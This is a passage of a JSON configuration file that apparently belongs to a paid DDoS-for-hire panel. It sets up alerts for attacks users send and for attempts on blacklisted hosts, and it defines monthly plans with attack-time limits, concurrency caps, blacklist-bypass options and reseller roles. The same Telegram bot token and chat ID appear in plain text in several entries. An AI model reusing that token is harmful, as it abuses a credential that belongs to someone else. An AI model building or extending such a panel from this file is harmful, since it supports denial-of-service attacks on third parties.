                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "USER ACTION ALERT",
                "chat_id": "5917899680",
                "enabled": true
            },
            "reseller_actions": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "RESELLER ACTION ALERT",
                "chat_id": "5917899680",
                "enabled": true
            },
            "admin_actions": {
                "token": "7535533716:AAFalKNLhx644nJpRlS_yKc1wXutTByNoXk",
                "title": "ADMIN ACTION ALERT",
                "chat_id": "5917899680",
                "enabled": true
            }
        },
        "discord": {
            "attack_sent": {
                "webhook": "",
                "title": "USER ATTACK SENT SUCCESSFULLY",
                "image": "https://www.clker.com/cliparts/0/f/7/0/11954234311954389563ok_mark_h_kon_l_vdal_02.svg.med.png",
                "hex_color": "",
                "enabled": false
            },
            "blacklisted_host": {
                "webhook": "",
                "title": "USER TRIED ATTACKING BLACKLIST",
                "image": "https://www.clker.com/cliparts/5/9/5/4/12456868161725760927raemi_Cross_Out.svg.med.png",
                "hex_color": "",
                "enabled": false
            },
            "ip_log": {
                "webhook": "",
                "title": "USER LOGGED IN",
                "image": "https://pluspng.com/img-png/attention-sign-png-attention-sign-traffic-road-sign-warning-caution-788.png",
                "hex_color": "",
                "enabled": false
            },
            "failed_mfa": {
                "webhook": "",
                "title": "USER FAILED MFA",
                "image": "http://www.clker.com/cliparts/f/3/8/9/1194984837281670682DangerGeneral.svg.med.pngg",
                "hex_color": "",
                "enabled": false
            },
            "failed_captcha": {
                "webhook": "",
                "title": "USER FAILED CAPTCHA",
                "image": "http://www.clker.com/cliparts/f/3/8/9/1194984837281670682DangerGeneral.svg.med.png",
                "hex_color": "",
                "enabled": false
            },
            "user_actions": {
                "webhook": "",
                "title": "USER ACTION ALERT",
                "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/4/4e/OOjs_UI_icon_alert_destructive.svg/480px-OOjs_UI_icon_alert_destructive.svg.png",
                "hex_color": "",
                "enabled": false
            },
            "reseller_actions": {
                "webhook": "",
                "title": "RESELLER ACTION ALERT",
                "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/4/4e/OOjs_UI_icon_alert_destructive.svg/480px-OOjs_UI_icon_alert_destructive.svg.png",
                "hex_color": "",
                "enabled": false
            },
            "admin_actions": {
                "webhook": "",
                "title": "ADMIN ACTION ALERT",
                "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/4/4e/OOjs_UI_icon_alert_destructive.svg/480px-OOjs_UI_icon_alert_destructive.svg.png",
                "hex_color": "",
                "enabled": false
            }
        }
    },
    "plan_presets": [
        {
            "name": "MONTHLY",
            "options": {
                "vip": {
                    "enabled": false,
                    "vip_duration_in_days": 1000
                },
                "reseller": false,
                "mod": false,
                "admin": false,
                "custom_roles": {
                    "enabled": true,
                    "roles": [
                        {
                            "role_name": "Main Network",
                            "role_duration_in_days": 30
                        }
                    ]
                },
                "api_access": false,
                "bypass_power_saving": false,
                "bypass_spam_protection": false,
                "bypass_blacklist": false,
                "bypass_soft_max_time": false,
                "cooldown_in_seconds": 0,
                "max_time_in_seconds": 300,
                "max_concurrents": 1,
                "plan_length_in_days": 30
            }
        },
        {
            "name": "MONTHLYVIP",
            "options": {
                "vip": {
                    "enabled": true,
                    "vip_duration_in_days": 1000
                },
                "reseller": false,
                "mod": false,
                "admin": false,
                "custom_roles": {
                    "enabled": false,
                    "roles": [
                        {
                            "role_name": "Main Network",
                            "role_duration_in_days": 30
                        }
                    ]
                },
                "api_access": false,
                "bypass_power_saving": false,
                "bypass_spam_protection": false,
                "bypass_blacklist": false,
                "bypass_soft_max_time": false,
                "cooldown_in_seconds": 0,
                "max_time_in_seconds": 300,
                "max_concurrents": 1,
                "plan_length_in_days": 30
            }
        }
    ],
    "themes": [
        {
            "name": "default",
            "description": "",
            "example": "assets/banners/default/branding/clear_splash.tfx",
            "colour": "[97m"
        }
    ],
    "custom_banners": [
        {
            "name": "methods",
            "description": "View attack methods page.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/methods.tfx",
            "command_aliases": []
        },
        {
            "name": "plan",
            "description": "View your plan details.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/plan.tfx",
            "command_aliases": [
                "acc",
                "account"
            ]
        },
        {
            "name": "help",
            "description": "View the help page.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/help.tfx",
            "command_aliases": [
                "h",
                "?"
            ]
        }
    ]
}